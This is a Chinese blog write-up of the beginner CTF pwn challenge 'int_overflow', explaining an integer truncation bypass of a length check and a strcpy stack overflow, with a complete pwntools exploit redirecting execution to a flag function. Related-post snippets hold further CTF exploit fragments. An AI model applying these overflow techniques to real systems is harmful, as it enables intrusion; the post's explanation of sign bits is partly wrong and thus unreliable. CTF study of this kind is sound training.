攻防世界-pwn新手区-int_overflow

最新推荐文章于 2022-06-01 18:17:14 发布
最新推荐文章于 2022-06-01 18:17:14 发布
阅读量263 收藏
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHAWUCIREN1/article/details/119567056
版权

看题目就知道是整形溢出

运行一下
在这里插入图片描述
检查一下保护机制
在这里插入图片描述
丢入32位ida里面
在这里插入图片描述

发现一个函数
在这里插入图片描述
可以通过覆盖跳转到这个函数就可以拿到flag
在这里插入图片描述

system_addr = 0x804868B

在这里插入图片描述
check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出
在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置
比如260的十六进制是104,因为是无符号位,所以要把第一位的符号位1去掉,也就是说是4,满足v3的条件判定,成功绕过

上面的strcpy要把s拷到dest上,查看一下他们的栈空间
在这里插入图片描述
覆盖到r就行
payload = b’A’*(0x14 + 0x4)

from pwn import *

context(os="linux", arch="x86", log_level="debug")

p = process('./int_overflow')
system_addr = 0x804868B
payload = b'A'*(0x14 + 0x4) + p32(system_addr)
payload = payload.ljust(260,b'a')
p.recvuntil("Your choice:")
p.sendline("1")
p.recvuntil("Please input your username:\n")
p.sendline("xmr")
p.recvuntil("Please input your passwd:\n")
p.sendline(payload)
p.interactive()
续梦人
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 int_overflow
09-28 744
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
adworld攻防世界-pwn-新手-wp
令则
03-05 955
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 401
[攻防世界]int_overflow巨细
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2649
pwn新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1906
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出,溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
攻防世界-wp-PWN-新手-8-int_overflow
Scorpio_m7
03-10 268
题目描述: 菜鸡感觉这题似乎没有办法溢出,真的么? 题目场景 111.200.241.244:44057 题目附件: 51ed19eacdea43e3bd67217d08eb8a0e 题目思路: 整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数。unsigned short int类型占用2字节,取值范围0~65535。 解题过程: 对于一个2字节的Unsigned short int型变量,它的有效数据长度为两个字节,当它的数据长度超过
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2310
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界 - pwn - int_overflow
qq726232111的博客
03-16 231
A、流程分析 3 < 密码长度 <=8 ,打印success, 并执行strcpy()函数 B、利用分析 密码长度使用AL -> 8位 判断 , strlen()返回eax 则可以使用大量数据填充,使低8位保证在4-8即可,用于构造payload strcpy(ebp-14h,[ebp+8]) , ebp+8存储为输入密码...
攻防世界--pwn--新手-WP合集-目录
ATFWUS的博客
03-03 2080
到今天为止,攻防世界pwn新手的题已经做完,整理了这10道题的WP,比较基础。 这里是10道题的统一文件: 链接:https://pan.baidu.com/s/1tXPMWvrWA7XW7zhDYsA4kA 提取码:3jrn 下面是WP的合集: get_shell--writeup cgpwn2---writeup when_did_you_...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ciscn-2019-pwn
11-29
1. **baby_pwn** - 这个名字通常用于新手级别的Pwn题目,"baby"意味着它相对简单,是初学者学习基础漏洞利用技术的入门级挑战。 2. **bms** - 可能代表“Building Management System”,是一个模拟建筑管理系统的...
BUUCTF pwn1_sctf_2016
CHAWUCIREN1的博客
04-08 3408
执行一下 似乎出现第一个i被替换成you 检查一下保护机制 丢到ida里面 输入的变量s大小为0x3c,但是我们看fgets里面,我们只能输入32个字符,没法进行溢出, 我们在输入的时候,会发现i会被替换成you,所以我们可以利用20个i来填充, 找到shell,地址为0x8048F0D 返回地址再随便填四个字符 我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p
攻防世界-进阶-实时数据监测
CHAWUCIREN1的博客
12-01 2927
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
pwnthebox-rip
CHAWUCIREN1的博客
12-02 2586
gets函数不限制输入的长度,存在溢出 查看栈空间,payload = 0xf + 8 发现fun()函数, 构造exp from pwn import * p = process('pwn1') #p = remote('redirect.do-not-trust.hacking.run',10026) payload = b'A'*0xF+ p64(0x401186) p.sendline(payload) p.interactive() ...
buuctf-N1Book[第六章 CTF之PWN章]
CHAWUCIREN1的博客
10-17 2277
64位,开启了NX保护 shift + F12查看里面的字符串 发现自带system和bin/sh的地址 bin_sh = 0x400537 gets函数对输入的长度没有限制 查看一下v1的栈空间 需要填充0xA + 0x8的空间 payload = “A” *(0xA + 8) 由于存在栈对齐,所以还要加一个地址 ret = 0x40054E 构造的exp如下 from pwn import * #p = process("./stack") p = remote("node4.buuoj..
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值